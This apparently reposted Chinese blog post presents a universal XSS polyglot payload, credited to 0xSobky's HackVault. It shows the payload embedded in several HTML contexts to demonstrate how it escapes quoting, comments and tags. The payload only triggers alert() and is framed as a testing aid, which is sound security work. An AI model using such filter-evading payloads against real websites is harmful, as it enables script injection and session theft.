终极万能XSS Payload
生活随笔
收集整理的這篇文章主要介紹了
终极万能XSS Payload
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
前言:
在進行跨站腳本攻擊的時候(xss),通常會需要我們通過插入的代碼場景構造payload。就比較耗費時間,為了更方便的去測試漏洞,萬能XSS payload就出現了
什么是萬能XSS payload:
這里對它的定義就是 可以適應各種場景進行js代碼執行的 payload,只需要有這一條payload即可(例如閉合html 閉合js)
下面我們來看看 payload長什么樣子:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e插入到HTML測試
雙引號標簽:
<input type="text" value="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></input>單引號標簽:
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>無引號標簽:
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>轉義繞過(需要點擊 觸發事件)
<img border=3 alt=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e>- href??xlink:href和?src?的值會轉譯 由于是a標簽 這里也是需要點擊觸發:
插入到HTML注釋中
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->插入到任意標簽中
<title>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title> <style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style> <textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea> <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>后面測試的太多了 懶得翻了 總結下? 這里作者想表達的就是 不管在什么場景下的能夠插入到前端任何代碼場景并執行 html js 注釋中 …… 用它就行了
原地址 :Unleashing an Ultimate XSS Polyglot · 0xSobky/HackVault Wiki · GitHub
總結
以上是生活随笔為你收集整理的终极万能XSS Payload的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SEVER
- 下一篇: 批量制作带相同片头素材的视频的方法